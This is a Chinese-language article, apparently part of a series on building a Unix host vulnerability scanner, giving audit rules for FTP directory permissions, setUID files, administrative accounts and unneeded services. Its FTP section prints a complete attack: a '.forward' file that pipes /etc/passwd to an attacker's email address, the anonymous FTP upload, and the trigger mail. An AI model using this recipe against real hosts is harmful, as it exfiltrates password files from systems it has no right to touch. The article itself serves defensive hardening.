新聞中心
Unix主機(jī)漏洞掃描器的設(shè)計(jì)與實(shí)現(xiàn)之審核文件和目錄權(quán)限規(guī)則

網(wǎng)站建設(shè)哪家好,找創(chuàng)新互聯(lián)建站!專(zhuān)注于網(wǎng)頁(yè)設(shè)計(jì)、網(wǎng)站建設(shè)、微信開(kāi)發(fā)、小程序定制開(kāi)發(fā)、集團(tuán)企業(yè)網(wǎng)站建設(shè)等服務(wù)項(xiàng)目。為回饋新老客戶(hù)創(chuàng)新互聯(lián)還提供了大祥免費(fèi)建站歡迎大家使用!
(1)FTP的根目錄
FTP的根目錄不同于主機(jī)系統(tǒng)的根目錄,所以FTP下看到的/etc/passwd和系統(tǒng)的/etc/passwd不是一個(gè)文件,但有些不稱(chēng)職的系統(tǒng)管理員在創(chuàng)建FTP目錄結(jié)構(gòu)時(shí)會(huì)把系統(tǒng)的/etc/passwd文件直接拷貝過(guò)來(lái),這就會(huì)給黑客以可乘之機(jī)。
FTP的根目錄是在系統(tǒng)的/etc/passwd文件中指定的,也就是用匿名FTP登錄到主機(jī)后的起始目錄。
例如:事先編寫(xiě)forward_sucker_file shell腳本,內(nèi)容為:
- sun% cat forward_sucker_file
- "| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email protected]"
- 通過(guò)FTP將forward_sucker_file腳本傳送到目標(biāo)主機(jī)(如ngcc.com)
- sun% ftp ngcc.com
- Connected to ngcc.com
- 220 victim FTP server ready.
- Name (ngcc.com:zy): ftp
- 331 Guest login ok, send ident as password.
- Password: [輸入電子郵件地址]
- 230 Guest login ok, access restrictions apply.
- ftp> put forward_sucker_file .forward
- 43 bytes sent in 0.0015 seconds (28 Kbytes/s)
- ftp> quit
將passwd文件內(nèi)容發(fā)送到黑客郵件地址:
sun% echo test | mail [email protected]
如果匿名FTP主目錄可寫(xiě),可以在其下投放一個(gè)".forward"文件;文件內(nèi)容是一行用雙引號(hào)引起來(lái)的Shell命令;".forward"文件是用于郵件轉(zhuǎn)發(fā)的:如果某一用戶(hù)(此處為ftp)的主目錄下有這個(gè)文件,那么當(dāng)該用戶(hù)收到郵件時(shí),就要視".forward"的內(nèi)容進(jìn)行轉(zhuǎn)發(fā)。如果".forward"的內(nèi)容為一些電子郵件地址,該郵件就被轉(zhuǎn)發(fā)到這些地址;而如果為一行用雙引號(hào)引起來(lái)的Shell命令,則該郵件的內(nèi)容被重定向到此命令。此處,命令為:"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email protected]",實(shí)際上對(duì)重定向過(guò)來(lái)的作為輸入的郵件內(nèi)容沒(méi)有做任何處理,而是把/etc/passwd(為了防止被安全機(jī)制過(guò)濾,先在每一行行首增加一個(gè)空格)發(fā)到了攻擊者的電子郵件地址([email protected])。因此,在投放了這樣一個(gè)".forward"文件后,再隨便發(fā)一封電子郵件給victim.com上的FTP用戶(hù),通過(guò)"轉(zhuǎn)發(fā)"功能,ngcc.com上的/etc/passwd文件就寄到攻擊者的電子郵件地址上。
(2)其他文件和目錄
確保沒(méi)有其他文件和目錄被FTP用戶(hù)或所在的組擁有所有權(quán)(ownered by ftp account and ftp group);否則,黑客可能借助特洛伊木馬程序?qū)戏ㄎ募M(jìn)行替代,構(gòu)成漏洞隱患。
除了~/ftp/incoming目錄外,匿名(anonymous)FTP 用戶(hù)在其他目錄下不能創(chuàng)建任何文件和子目錄。
文件和目錄權(quán)限修改要慎重:對(duì)于系統(tǒng)或CERT組織推薦的有關(guān)特定文件的讀寫(xiě)權(quán)限,如/var/adm/utmpx和/var/adm/wtmpx文件權(quán)限應(yīng)該為644,不要輕易修改。一般情況下,擁有對(duì)任何文件和目錄具有寫(xiě)權(quán)限的用戶(hù)只能是超級(jí)用戶(hù),進(jìn)一步說(shuō),如果一個(gè)文件或目錄可寫(xiě),則可寫(xiě)者只能為超級(jí)用戶(hù)。
(3)setUID和setGID問(wèn)題
setUID的作用是允許程序以一個(gè)特定用戶(hù)的身份去運(yùn)行,而不管到底是誰(shuí)在運(yùn)行它。就是說(shuō),setUID允許程序?qū)⑵溆脩?hù)ID改變?yōu)榱硪粋€(gè)用戶(hù)的ID。SetGID功能同setUID,區(qū)別是將一個(gè)正在運(yùn)行的程序的組帳號(hào)改變?yōu)橐粋€(gè)特定的組帳號(hào)。setUID和setGID只使用于可執(zhí)行文件,二者對(duì)某些特定的程序才可以訪問(wèn)特定信息的情形是很有價(jià)值的。如普通用戶(hù)在運(yùn)行passwd命令時(shí),由于該命令setUID為root,則可以獲得修改只有root才有相應(yīng)權(quán)限的/etc/shadow文件,從而改變自己的口令。
但是,setUID和setGID容易被黑客利用來(lái)制造緩沖區(qū)溢出,從而永久獲得root權(quán)限。據(jù)CERT指出,利用setUID制造緩沖區(qū)溢出是黑客獲得root權(quán)限的主要方法之一。因此,系統(tǒng)管理員不能隨意賦予可執(zhí)行文件setUID和setGID特性。
Unix主機(jī)漏洞掃描器的設(shè)計(jì)與實(shí)現(xiàn)之審核用戶(hù)帳戶(hù)的安全性規(guī)則
Solaris和Irix等Unix系統(tǒng)中,除去超級(jí)用戶(hù)外,還存在如lp、sys、adm、nobody等管理帳戶(hù)。雖然它們沒(méi)有超級(jí)用戶(hù)的特權(quán),但同樣應(yīng)受到保護(hù),因?yàn)檫@些帳戶(hù)的系統(tǒng)進(jìn)程可以控制基本的系統(tǒng)功能,如電子郵件、關(guān)系數(shù)據(jù)庫(kù)訪問(wèn)、打印等。這些管理帳戶(hù)內(nèi)的任何一個(gè)遭到攻擊,都可能導(dǎo)致相應(yīng)子系統(tǒng)中的文件被大規(guī)模地暴露和損壞。例如,lp帳戶(hù)所受的破壞可能會(huì)造成攻擊者對(duì)打印子系統(tǒng)獲得完全控制,從而使黑客能夠任意地修改打印輸出的內(nèi)容。
從管理帳戶(hù)在Web服務(wù)器運(yùn)作中的職責(zé)和作用看,大部分應(yīng)該予以封閉。比如lp,Web服務(wù)器上是沒(méi)有必要也不允許打印文件的。由于這些管理帳戶(hù)是Unix系統(tǒng)預(yù)裝的,系統(tǒng)管理員常予以保留。但這些管理帳戶(hù)可能被黑客利用,且它們對(duì)Web服務(wù)器用處不大。所以,一些管理帳戶(hù),包括daemon、sys、lp、adm、uucp、nuucp、listen,應(yīng)該封閉。
此外,超級(jí)用戶(hù)的PATH(在cshell中存在于.cshrc文件,在kshell中存在于.profile文件)或LD_LIBRARY_PATH變量中,不應(yīng)該存在"."或"~"字符,因?yàn)楹诳涂赡芾眠@一點(diǎn)來(lái)植入特洛伊木馬程序。
審核用戶(hù)帳戶(hù)的安全性規(guī)則涉及到/etc/passwd和/etc/shadow兩個(gè)核心文件。一方面,系統(tǒng)管理員要保證其內(nèi)容完整性,禁止非法修改,或者及時(shí)發(fā)現(xiàn)非法修改并予以修正;另一方面,禁止無(wú)口令或弱勢(shì)口令的存在。所謂弱勢(shì)口令指易于猜測(cè)、破解或長(zhǎng)期不變更的口令。實(shí)踐表明,主機(jī)安全的核心問(wèn)題是超級(jí)用戶(hù)的口令安全問(wèn)題。超級(jí)用戶(hù)的口令被泄露或被成功破解,等于拱手將服務(wù)器系統(tǒng)的所有管理權(quán)讓于黑客,黑客可以輕易獲得主機(jī)內(nèi)的所有數(shù)據(jù)。
Unix主機(jī)漏洞掃描器的設(shè)計(jì)與實(shí)現(xiàn)之禁止不必要的網(wǎng)絡(luò)訪問(wèn)服務(wù)規(guī)則
所謂不必要的網(wǎng)絡(luò)訪問(wèn)服務(wù)是指實(shí)現(xiàn)主機(jī)系統(tǒng)網(wǎng)絡(luò)服務(wù)功能所不需要運(yùn)行的服務(wù)。對(duì)于Web主機(jī)而言,很多網(wǎng)絡(luò)訪問(wèn)服務(wù)在操作系統(tǒng)安裝時(shí)就被缺省配置,其所對(duì)應(yīng)的TCP/UDP端口也對(duì)外打開(kāi),如非常危險(xiǎn)的finger服務(wù)和它對(duì)應(yīng)的79號(hào)TCP端口。
通過(guò)對(duì)網(wǎng)站的端口掃描,可以發(fā)現(xiàn)很多系統(tǒng)管理員對(duì)外提供了或多或少的不必要的網(wǎng)絡(luò)訪問(wèn)服務(wù)。而從系統(tǒng)內(nèi)部審核不必要網(wǎng)絡(luò)訪問(wèn)服務(wù)的方法是禁止不必要的網(wǎng)絡(luò)訪問(wèn)服務(wù)的最有效手段之一。需要補(bǔ)充的是,另外一些需要禁止的服務(wù)為:sendmail、NFS服務(wù)器和客戶(hù)機(jī)、automounter和rexd等。
由于sendmail是著名的漏洞程序,很多機(jī)構(gòu)購(gòu)置了Netscape Messaging Server等其他mail服務(wù)軟件加以替代;rexd服務(wù)基本無(wú)安全可言,遠(yuǎn)程用戶(hù)可以象在本地一樣暢通無(wú)阻地運(yùn)行本地主機(jī)的程序。因此rexd處于被禁之列。
【編輯推薦】
- Unix主機(jī)漏洞掃描器的設(shè)計(jì)與實(shí)現(xiàn)(1)
- Unix主機(jī)漏洞掃描器的設(shè)計(jì)與實(shí)現(xiàn)(2)
- Unix主機(jī)漏洞掃描器的設(shè)計(jì)與實(shí)現(xiàn)之背景和必然性分析
- Unix主機(jī)漏洞掃描器的設(shè)計(jì)與實(shí)現(xiàn)之系統(tǒng)安全性分析及技術(shù)概述
本文名稱(chēng):Unix主機(jī)漏洞掃描器的設(shè)計(jì)與實(shí)現(xiàn)(3)
網(wǎng)頁(yè)地址:http://m.fisionsoft.com.cn/article/cdpchpc.html


咨詢(xún)
建站咨詢(xún)
